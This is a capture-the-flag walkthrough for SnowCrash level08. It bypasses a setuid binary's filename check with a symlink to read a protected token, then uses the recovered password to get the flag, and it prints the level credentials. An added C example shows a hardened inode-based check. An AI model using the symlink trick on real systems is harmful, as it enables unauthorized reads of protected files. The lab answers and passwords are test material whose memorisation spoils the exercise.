# Level 08

## how to login

username: level08

password: fiumuikeil55xe9cu4dood66h

## Goal

run `getflag` as user `flag08`

## Actually doing something

```bash
level08@SnowCrash:~$ ll
total 28
dr-xr-x---+ 1 level08 level08 140 Mar 5 2016 ./
d--x--x--x 1 root users 340 Aug 30 2015 ../
-r-x------ 1 level08 level08 220 Apr 3 2012 .bash_logout*
-r-x------ 1 level08 level08 3518 Aug 30 2015 .bashrc*
-rwsr-s---+ 1 flag08 level08 8617 Mar 5 2016 level08*
-r-x------ 1 level08 level08 675 Apr 3 2012 .profile*
-rw------- 1 flag08 flag08 26 Mar 5 2016 token
```

Interesting: we have the usual setuid binary, but we also have a file named `token` that we can't read. I wonder if the flag is there.

Let's run the binary and see what happens.

```bash
level08@SnowCrash:~$ ./level08
./level08 [file to read]
level08@SnowCrash:~$ ./level08 token
You may not access 'token'
```

It is a little bit smart. Let's try to outsmart it by using symlinks.

```bash
level08@SnowCrash:~$ ln -s $(realpath token) /tmp/level08
level08@SnowCrash:~$ ./level08 /tmp/level08
quif5eloekouj29ke0vouxean
```

The old tale of checking the filename, and not the actual file!

We can now get the actual token with that password:

```bash
level08@SnowCrash:~$ su flag08 -c getflag
Password:
Check flag.Here is your token : 25749xKZ8L7DkSCwJkT9dyv6f
```
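
The filename-versus-file mistake described above, as an added C example (not the `level08` binary's source, which this page does not show). `name_check_allows` assumes the binary does a substring test on its argument; `open_unless_protected` is a hypothetical hardened replacement that compares device and inode on the opened descriptor, and the temp paths in `demo` are constructed.

```c
#define _DEFAULT_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Weak check (assumed shape of level08's test): judges the path string only. */
int name_check_allows(const char *path) {
    return strstr(path, "token") == NULL;
}

/* Hardened check (hypothetical): open first, then compare the opened object's
 * identity (device + inode) with the protected file. Returns fd, or -1 if denied. */
int open_unless_protected(const char *path, const char *protected_path) {
    struct stat want, got;
    if (stat(protected_path, &want) != 0) return -1;
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    if (fstat(fd, &got) != 0 ||
        (got.st_dev == want.st_dev && got.st_ino == want.st_ino)) {
        close(fd);
        return -1;
    }
    return fd; /* caller reads from this fd and never re-opens the path */
}

/* Constructed demo: temp dir holding "token" plus a symlink to it named "notes".
 * Returns bit0 = weak check allowed the link, bit1 = hardened check allowed it. */
int demo(void) {
    char dir[] = "/tmp/l08demoXXXXXX", tok[64], lnk[64];
    if (!mkdtemp(dir)) return -1;
    snprintf(tok, sizeof tok, "%s/token", dir);
    snprintf(lnk, sizeof lnk, "%s/notes", dir);
    int fd = open(tok, O_WRONLY | O_CREAT, 0600);
    if (fd < 0 || symlink(tok, lnk) != 0) return -1;
    close(fd);
    int weak = name_check_allows(lnk);
    int hfd = open_unless_protected(lnk, tok);
    int hard = hfd >= 0;
    if (hfd >= 0) close(hfd);
    unlink(lnk); unlink(tok); rmdir(dir);
    return weak | (hard << 1);
}

int main(void) { printf("result bits: %d\n", demo()); return 0; }
```

Doing the comparison with `fstat` on the already opened descriptor also avoids the check-then-open race that a path-based comparison would have.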